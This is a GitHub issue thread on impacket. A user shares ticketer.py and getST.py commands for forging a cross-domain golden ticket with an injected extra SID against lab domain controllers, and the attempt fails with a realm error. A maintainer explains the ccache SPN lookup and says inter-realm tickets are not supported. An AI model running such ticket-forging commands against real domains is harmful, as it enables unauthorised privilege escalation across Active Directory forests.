### ISSUE TITLE
why ccache.py change sname?

### ISSUE THREAD

**Issue by 12end** [SecureAuthCorp/impacket#1278]
### Configuration  
impacket version:  0.9.24
Python version:  3.9.7
Target OS: windows server 2012 r2(dc01.sub.local.com);windows server 2012 r2(dc.local.com)
Target IP: 192.168.31.210(dc01.sub.local.com);192.168.31.200(dc.local.com)

### Debug Output With Command String  
```
ticketer.py -nthash [LOCAL$ rc4] -domain sub.local.com -domain-sid S-1-5-21-3246485242-2847592758-390507984 -extra-sid S-1-5-21-3699338023-2969729399-3120287155-509 -spn krbtgt/local.com administrator
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sub.local.com/administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in administrator.ccache

getST.py -dc-ip 192.168.31.200 -spn cifs/dc.local.com@local.com sub.local.com/administrator -k -no-pass -debug
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[+] Impacket Library Installation Path: /usr/local/lib/python3.9/site-packages/impacket
[+] Using Kerberos Cache: administrator.ccache
[+] SPN KRBTGT/SUB.LOCAL.COM@SUB.LOCAL.COM not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache.
[*] Getting TGT for user
[+] Trying to connect to KDC at 192.168.31.200
[+] Server time (UTC): 2022-03-14 14:39:09
Traceback (most recent call last):
  File "/usr/local/bin/getST.py", line 748, in <module>
    executer.run()
  File "/usr/local/bin/getST.py", line 645, in run
    tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
  File "/usr/local/lib/python3.9/site-packages/impacket/krb5/kerberosv5.py", line 179, in getKerberosTGT
    r = sendReceive(message, domain, kdcHost)
  File "/usr/local/lib/python3.9/site-packages/impacket/krb5/kerberosv5.py", line 91, in sendReceive
    raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
Kerberos SessionError: KDC_ERR_WRONG_REALM(Reserved for future use)
```

### Additional context  
In this case,I want generate a SIDHistory cross-domain golden ticket by Inter-Realm Key.I mentiond this:
`[+] SPN KRBTGT/SUB.LOCAL.COM@SUB.LOCAL.COM not found in cache`,but my purpose SPN is `KRBTGT/LOCAL.COM@LOCAL.COM` what in the ticket,I wonder why ccache.py try to change this.

**Comment by 0xdeaddood** [comment]
Hi @12end!

`ccache.py` doesn't change anything. It looks for an SPN built with the domain of the target user, as you can see [here](https://github.com/SecureAuthCorp/impacket/blob/master/impacket/krb5/ccache.py#L415-L421) in the code:

```python
principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
creds = ccache.getCredential(principal)
```

Because you defined `sub.local.com/administrator` as the user, ccache is looking for the SPN `KRBTGT/SUB.LOCAL.COM@SUB.LOCAL.COM`.

As I mentioned [here](https://github.com/SecureAuthCorp/impacket/issues/1277), Impacket doesn't support inter-realms tickets yet.
